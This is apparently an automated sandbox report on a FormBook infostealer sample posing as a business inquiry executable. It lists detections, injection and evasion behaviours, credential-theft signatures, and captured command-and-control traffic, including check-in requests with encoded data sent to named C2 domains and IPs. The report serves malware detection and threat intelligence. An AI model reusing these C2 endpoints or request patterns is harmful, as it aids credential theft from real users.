Windows Analysis Report
CSZ inquiry for MH raw material.exe

Overview

General Information

Sample name: CSZ inquiry for MH raw material.exe
Analysis ID: 1590081
MD5: 2a3034abc9b8ee8875f9cd98c388ab07
SHA1: 0cfe449dad046b2b0cf594841f675e9d21ecdb1d
SHA256: b022e4df0d9e6c8eeea122e642708a9d13b8a7e861a4d121e0c54e80a28a1cc4
Tags: exe, user-James_inthe_box

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CSZ inquiry for MH raw material.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe" MD5: 2A3034ABC9B8EE8875F9CD98C388AB07)
    • mSWyWMUGFWJCYT.exe (PID: 2340 cmdline: "C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 3308 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • mSWyWMUGFWJCYT.exe (PID: 524 cmdline: "C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 2040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T15:12:00.551136+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49970 | 47.83.1.90 | 80 | TCP
2025-01-13T15:12:23.765934+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49975 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:37.125958+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49979 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:51.673190+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49983 | 134.122.135.48 | 80 | TCP
2025-01-13T15:13:04.984315+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49987 | 199.192.21.169 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T15:12:00.551136+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49970 | 47.83.1.90 | 80 | TCP
2025-01-13T15:12:23.765934+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49975 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:37.125958+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49979 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:51.673190+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49983 | 134.122.135.48 | 80 | TCP
2025-01-13T15:13:04.984315+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49987 | 199.192.21.169 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T15:12:16.130205+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49972 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:18.671305+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49973 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:21.231723+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49974 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:29.500646+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49976 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:32.013724+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49977 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:34.547791+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49978 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:43.965959+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49980 | 134.122.135.48 | 80 | TCP
2025-01-13T15:12:46.486294+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49981 | 134.122.135.48 | 80 | TCP
2025-01-13T15:12:49.063476+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49982 | 134.122.135.48 | 80 | TCP
2025-01-13T15:12:57.418188+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49984 | 199.192.21.169 | 80 | TCP
2025-01-13T15:12:59.875023+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49985 | 199.192.21.169 | 80 | TCP
2025-01-13T15:13:02.590146+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49986 | 199.192.21.169 | 80 | TCP
2025-01-13T15:13:11.105513+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 154.197.162.239 | 80 | TCP
2025-01-13T15:13:14.071351+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49989 | 154.197.162.239 | 80 | TCP
2025-01-13T15:13:16.637822+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49990 | 154.197.162.239 | 80 | TCP

              AV Detection

              Source: CSZ inquiry for MH raw material.exe, Avira: detected
              Source: http://www.gayhxi.info/k2i2/?e4M=Tfa0_jE0&ptH8A6=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWnvTNq0buLUzVN+8DkO+pt5xnDU0gcgj2/kU9yS2vcWWPXQj2rjTuuLx, Avira URL Cloud: Label: malware
              Source: CSZ inquiry for MH raw material.exe, ReversingLabs: Detection: 73%
              Source: CSZ inquiry for MH raw material.exe, Virustotal: Detection: 66%
              Source: Yara match, File source: 0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
              Source: CSZ inquiry for MH raw material.exe, Joe Sandbox ML: detected
              Source: CSZ inquiry for MH raw material.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: CSZ inquiry for MH raw material.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000002.2506703605.00000000011C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000002.2506703605.00000000011C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mSWyWMUGFWJCYT.exe, 00000009.00000000.1586785927.0000000000C3E000.00000002.00000001.01000000.00000005.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000000.1731726848.0000000000C3E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000131F000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.000000000166E000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.0000000001047000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1666491001.0000000003525000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1663813416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.000000000386E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.00000000036D0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: CSZ inquiry for MH raw material.exe, CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000131F000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.000000000166E000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.0000000001047000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 0000000A.00000003.1666491001.0000000003525000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1663813416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.000000000386E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.00000000036D0000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exe, Code function: 10_2_02EBC870 FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\SysWOW64\fc.exe, Code function: 4x nop then xor eax, eax (10_2_02EA9EC0)
              Source: C:\Windows\SysWOW64\fc.exe, Code function: 4x nop then pop edi (10_2_02EAE4C7)
              Source: C:\Windows\SysWOW64\fc.exe, Code function: 4x nop then mov ebx, 00000004h (10_2_035204CE)
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe, Code function: 4x nop then pop edi (11_2_056E0529)
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe, Code function: 4x nop then pop edi (11_2_056CF538)
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe, Code function: 4x nop then pop edi (11_2_056D15BD)
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe, Code function: 4x nop then xor eax, eax (11_2_056D4D9C)
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe, Code function: 4x nop then pop edi (11_2_056E04BE)

              Networking

              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49973 -> 84.32.84.32:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 104.21.18.171:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 154.197.162.239:80
              Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49987 -> 199.192.21.169:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49987 -> 199.192.21.169:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49981 -> 134.122.135.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 84.32.84.32:80
              Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49979 -> 104.21.18.171:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49979 -> 104.21.18.171:80
              Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49975 -> 84.32.84.32:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49975 -> 84.32.84.32:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 104.21.18.171:80
              Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49983 -> 134.122.135.48:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49983 -> 134.122.135.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 154.197.162.239:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 104.21.18.171:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 199.192.21.169:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 134.122.135.48:80
              Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49970 -> 47.83.1.90:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49970 -> 47.83.1.90:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 199.192.21.169:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 154.197.162.239:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 84.32.84.32:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 134.122.135.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 199.192.21.169:80
              Source: Joe Sandbox View, IP Address: 154.197.162.239
              Source: Joe Sandbox View, IP Address: 104.21.18.171
              Source: Joe Sandbox View, IP Address: 199.192.21.169
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic, HTTP traffic detected:
                GET /k2i2/?e4M=Tfa0_jE0&ptH8A6=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWnvTNq0buLUzVN+8DkO+pt5xnDU0gcgj2/kU9yS2vcWWPXQj2rjTuuLx HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Host: www.gayhxi.info
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global traffic, HTTP traffic detected:
                GET /zaz4/?ptH8A6=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvD59p2x79JGj8+Yz9VVRMgvDTsTucbTnzBoQzXIZ9OSEU5EpWd7+rj1U&e4M=Tfa0_jE0 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Host: www.promocao.info
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global traffic, HTTP traffic detected:
                GET /kxtt/?ptH8A6=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvRsCKtwsoTwtBRtOzLnbykrUVFpky7P5wYQuQ25a4dovtn3QHJaU3t1x&e4M=Tfa0_jE0 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Host: www.grimbo.boats
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global traffic, HTTP traffic detected:
                GET /a59t/?ptH8A6=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgPqUeDekfARjRUucHmZ6H68xhcA6aT153Xsmr+pfOOQ7uAfOZkFusVC3&e4M=Tfa0_jE0 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Host: www.44756.pizza
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global traffic, HTTP traffic detected:
                GET /bowc/?e4M=Tfa0_jE0&ptH8A6=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwfh9UMCmV9sv26tPWfSpL+RY4eJUJjwe/OEwjvV/FXoNhKuiWFV4ToBJ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Host: www.lonfor.website
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global traffic, DNS traffic detected: DNS query: www.gayhxi.info
              Source: global traffic, DNS traffic detected: DNS query: www.promocao.info
              Source: global traffic, DNS traffic detected: DNS query: www.grimbo.boats
              Source: global traffic, DNS traffic detected: DNS query: www.44756.pizza
              Source: global traffic, DNS traffic detected: DNS query: www.lonfor.website
              Source: global traffic, DNS traffic detected: DNS query: www.investshares.net
              Source: unknown, HTTP traffic detected:
                POST /zaz4/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate
                Host: www.promocao.info
                Origin: http://www.promocao.info
                Cache-Control: max-age=0
                Content-Length: 219
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Referer: http://www.promocao.info/zaz4/
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                Data Ascii: ptH8A6=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczve6y8SurSvO5TapFsBRY/TBVK9kFEDJRrS0hflb9vdhQJHbnuA==
              Source: global traffic, HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 13 Jan 2025 14:12:29 GMT
                Content-Type: text/html; charset=iso-8859-1
                Transfer-Encoding: chunked
                Connection: close
                cf-cache-status: DYNAMIC
                vary: accept-encoding
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRmZ9nQhzZ1ed1fDgmXGma8fB955uWuMTV8O1iz8AqD2aGDGSMd9dvFv%2BK29jSV8Zx%2BJYsY4Df0V%2FXyim2dUT2l11S%2BCFzCwQn0Q5XRMz8uMGny9xBlGyjN0zGAdNHwofnJi"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 9015fb42dde8de94-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1626&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global traffic, HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 13 Jan 2025 14:12:31 GMT
                Content-Type: text/html; charset=iso-8859-1
                Transfer-Encoding: chunked
                Connection: close
                cf-cache-status: DYNAMIC
                vary: accept-encoding
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAi78G7bk18YaOPZQcAA5oxz2RaU3O%2BtaYxPTSCc2V%2BAbngqXXTQtTAS%2FuMJtCNFF6U3pfEqHgU7WyvxgthiSmh8ugeXSgldG53n55%2BM6uI2WvZAnrr4JBRpn1SBkGtI4mnI"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 9015fb527da98c1b-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2004&rtt_var=1002&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global traffic, HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 13 Jan 2025 14:12:34 GMT
                Content-Type: text/html; charset=iso-8859-1
                Transfer-Encoding: chunked
                Connection: close
                cf-cache-status: DYNAMIC
                vary: accept-encoding
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J9omE8MKObYe0UkPT6VTD%2FnAekwE6cI6KRXFcae1zDIlIuGFT1xyLyp%2FLzVWfp8AqGU%2BAw3jLfHzaPIybSK77YNaAK7SsQhZOuGy91nXB%2BZ0T%2BYlxNUdFe8rSoLNqI0lN3PW"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 9015fb625ce6c34b-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1784&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global traffic, HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 13 Jan 2025 14:12:37 GMT
                Content-Type: text/html; charset=iso-8859-1
                Transfer-Encoding: chunked
                Connection: close
                cf-cache-status: DYNAMIC
                vary: accept-encoding
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFktooRRtvOcfQxB8uMLEh8VT76xYSTAp0QHLyCuWOwB4GyirGnqQ%2BnsU53Ecbi286VCE9sAcmTkSHB6pqL%2F0%2FBF%2B8hmbYV4eabsaix5zCfY1IADLu6aIrPjdwosMRv1bY7E"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 9015fb727efec333-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1497&rtt_var=748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:43 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
